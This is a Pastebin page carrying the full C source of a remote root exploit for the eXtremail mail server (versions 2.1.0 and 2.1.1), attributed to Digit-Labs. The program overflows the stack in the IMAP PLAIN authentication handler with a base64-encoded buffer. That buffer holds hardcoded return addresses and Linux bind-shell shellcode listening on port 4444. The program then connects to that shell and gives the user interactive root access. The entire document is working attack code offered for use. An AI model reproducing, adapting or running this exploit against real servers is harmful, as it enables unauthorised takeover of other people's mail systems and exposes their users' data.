Googleinurl

eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflo

Mar 11th, 2015
513
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* extremail-v6.c
  2. *
  3. * Copyright (c) 2006 by <mu-b@digit-labs.org>
  4. *
  5. * eXtremail <=2.1.1 remote root exploit (x86-lnx)
  6. * by mu-b - Wed Oct 18 2006
  7. *
  8. * - Tested on: eXtremail 2.1.1 (lnx)
  9. * eXtremail 2.1.0 (lnx)
  10. *
  11. * Stack overflow in ifParseAuthPlain
  12. *
  13. * - Private Source Code -DO NOT DISTRIBUTE -
  14. * http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
  15. */
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19.  
  20. #include <string.h>
  21. #include <unistd.h>
  22. #include <netinet/in.h>
  23. #include <netdb.h>
  24.  
  25. #define BUF_SIZE 2048
  26. #define BBUF_SIZE BUF_SIZE/3*4+1
  27.  
  28. #define NOP 0x41
  29.  
  30. #define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
  31.  
  32. #define DEF_PORT 143
  33. #define PORT_IMAPD DEF_PORT
  34. #define PORT_SHELL 4444
  35.  
  36. static const char movshell_lnx[] =
  37. "\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
  38. "\x40" /* inc %eax */
  39. "\xff\xe0"; /* jmp *%eax */
  40.  
  41. static const char bndshell_lnx[] =
  42. "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
  43. "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
  44. "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
  45. "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
  46. "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
  47. "\x89\xe1\xcd\x80";
  48.  
  49. #define NUM_TARGETS 2
  50.  
  51. struct target_t
  52. {
  53. const char *name;
  54. const int len;
  55. const int zshell_pos;
  56. const char *zshell;
  57. const int fp_pos;
  58. const unsigned long fp;
  59. };
  60.  
  61. /* fp = objdump -D smtpd | grep "ff e0" */
  62. struct target_t targets[] = {
  63. {"Linux eXtremail 2.1.1 (tar.gz)",
  64. 256, 1, bndshell_lnx, 140, 0x08216357}
  65. ,
  66. {"Linux eXtremail 2.1.0 (tar.gz)",
  67. 256, 1, bndshell_lnx, 140, 0x08216377}
  68. ,
  69. {0}
  70. };
  71.  
  72. static const char base64tab[] =
  73. "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  74.  
  75. static int base64 (const char *ibuf, char *obuf, size_t n);
  76. static int sock_send (int sock, char *src, int len);
  77. static int sock_recv (int sock, char *dst, int len);
  78. static int sockami (char *host, int port);
  79. static void shellami (int sock);
  80. static void zbuffami (char *zbuf, struct target_t *trgt);
  81.  
  82. static int
  83. base64 (const char *ibuf, char *obuf, size_t n)
  84. {
  85. int a, b, c;
  86. int i, j;
  87. int d, e, f, g;
  88.  
  89. a = b = c = 0;
  90. for (j = i = 0; i < n; i += 3)
  91. {
  92. a = (unsigned char) ibuf[i];
  93. b = i + 1 < n ? (unsigned char) ibuf[i + 1] : 0;
  94. c = i + 2 < n ? (unsigned char) ibuf[i + 2] : 0;
  95.  
  96. d = base64tab[a >> 2];
  97. e = base64tab[((a & 3) << 4) | (b >> 4)];
  98. f = base64tab[((b & 15) << 2) | (c >> 6)];
  99. g = base64tab[c & 63];
  100.  
  101. if (i + 1 >= n)
  102. f = '=';
  103. if (i + 2 >= n)
  104. g = '=';
  105.  
  106. obuf[j++] = d, obuf[j++] = e;
  107. obuf[j++] = f, obuf[j++] = g;
  108. }
  109.  
  110. obuf[j++] = '\n';
  111. obuf[j++] = '\0';
  112.  
  113. return strlen (obuf);
  114. }
  115.  
  116. static int
  117. sock_send (int sock, char *src, int len)
  118. {
  119. int sbytes;
  120.  
  121. sbytes = send (sock, src, len, 0);
  122.  
  123. return (sbytes);
  124. }
  125.  
  126. static int
  127. sock_recv (int sock, char *dst, int len)
  128. {
  129. int rbytes;
  130.  
  131. rbytes = recv (sock, dst, len, 0);
  132. if (rbytes >= 0)
  133. dst[rbytes] = '\0';
  134.  
  135. return (rbytes);
  136. }
  137.  
  138. static int
  139. sockami (char *host, int port)
  140. {
  141. struct sockaddr_in address;
  142. struct hostent *hp;
  143. int sock;
  144.  
  145. fflush (stdout);
  146. if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
  147. {
  148. perror ("socket()");
  149. exit (-1);
  150. }
  151.  
  152. if ((hp = gethostbyname (host)) == NULL)
  153. {
  154. perror ("gethostbyname()");
  155. exit (-1);
  156. }
  157.  
  158. memset (&address, 0, sizeof (address));
  159. memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  160. address.sin_family = AF_INET;
  161. address.sin_port = htons (port);
  162.  
  163. if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
  164. {
  165. perror ("connect()");
  166. exit (EXIT_FAILURE);
  167. }
  168.  
  169. return (sock);
  170. }
  171.  
  172. static void
  173. shellami (int sock)
  174. {
  175. int n;
  176. fd_set rset;
  177. char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
  178.  
  179. sock_send (sock, cmd, strlen (cmd));
  180.  
  181. while (1)
  182. {
  183. FD_ZERO (&rset);
  184. FD_SET (sock, &rset);
  185. FD_SET (STDIN_FILENO, &rset);
  186. select (sock + 1, &rset, NULL, NULL, NULL);
  187. if (FD_ISSET (sock, &rset))
  188. {
  189. if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
  190. {
  191. fprintf (stderr, "Connection closed by foreign host.\n");
  192. exit (EXIT_SUCCESS);
  193. }
  194. printf ("%s", recvbuf);
  195. }
  196. if (FD_ISSET (STDIN_FILENO, &rset))
  197. {
  198. if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
  199. {
  200. recvbuf[n] = '\0';
  201. sock_send (sock, recvbuf, n);
  202. }
  203. }
  204. }
  205. }
  206.  
  207. static void
  208. zbuffami (char *zbuf, struct target_t *trgt)
  209. {
  210. int i;
  211. char *fill = "digitlabs";
  212.  
  213. memset (zbuf, NOP, trgt->len);
  214. memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
  215.  
  216. zbuf[trgt->fp_pos + 1] = (u_char) (trgt->fp & 0x000000ff);
  217. zbuf[trgt->fp_pos + 1 + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
  218. zbuf[trgt->fp_pos + 1 + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
  219. zbuf[trgt->fp_pos + 1 + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
  220.  
  221. memcpy (zbuf + trgt->fp_pos + 1 + sizeof (u_long), movshell_lnx,
  222. strlen (movshell_lnx));
  223.  
  224. /* rfc #2595 states "\x00<username>\x00<password>" */
  225. zbuf[0] = '\0';
  226. zbuf[trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx)] = '\0';
  227.  
  228. for (i = trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx) + 1;
  229. i < trgt->len; i++)
  230. zbuf[i] = fill[i % strlen (fill)];
  231. }
  232.  
  233. int
  234. main (int argc, char **argv)
  235. {
  236. int sock, rbytes;
  237. char zbuf[BUF_SIZE], sbuf[BBUF_SIZE];
  238. struct target_t *trgt;
  239.  
  240. printf ("eXtremail <=2.1.1 remote root exploit\n"
  241. "by: <mu-b@digit-labs.org>\n"
  242. "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
  243.  
  244. if (argc <= 2)
  245. {
  246. fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
  247. exit (EXIT_SUCCESS);
  248. }
  249.  
  250. if (atoi (argv[2]) >= NUM_TARGETS)
  251. {
  252. fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
  253. exit (EXIT_SUCCESS);
  254. }
  255.  
  256. trgt = &targets[atoi (argv[2])];
  257. printf ("+Connecting to %s...", argv[1]);
  258. sock = sockami (argv[1], PORT_IMAPD);
  259. rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
  260. if (rbytes < 0)
  261. exit (EXIT_SUCCESS);
  262. printf (" connected\n");
  263.  
  264. printf ("fp: 0x%x\n", (int) trgt->fp);
  265. printf ("buf len: %d\n", trgt->len);
  266.  
  267. printf ("+Building buffer with shellcode...");
  268. memset (zbuf, 0x00, sizeof (zbuf));
  269. zbuffami (zbuf, trgt);
  270. printf (" done\n");
  271.  
  272. printf ("+Building base64 encoded buffer...");
  273. base64 (zbuf, sbuf, trgt->len);
  274. printf (" done\n");
  275.  
  276. #ifdef DEBUG
  277. sleep (15);
  278. #endif
  279.  
  280. printf ("+Making request...");
  281. sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
  282. rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
  283. if (rbytes < 0)
  284. exit (EXIT_SUCCESS);
  285.  
  286. sock_send (sock, sbuf, strlen (sbuf));
  287. printf (" done\n");
  288.  
  289. printf ("+Waiting for the shellcode to be executed...\n");
  290. sleep (1);
  291. sock = sockami (argv[1], PORT_SHELL);
  292. printf ("+Wh00t!\n\n");
  293. shellami (sock);
  294.  
  295. return (EXIT_SUCCESS);
  296. }
RAW Paste Data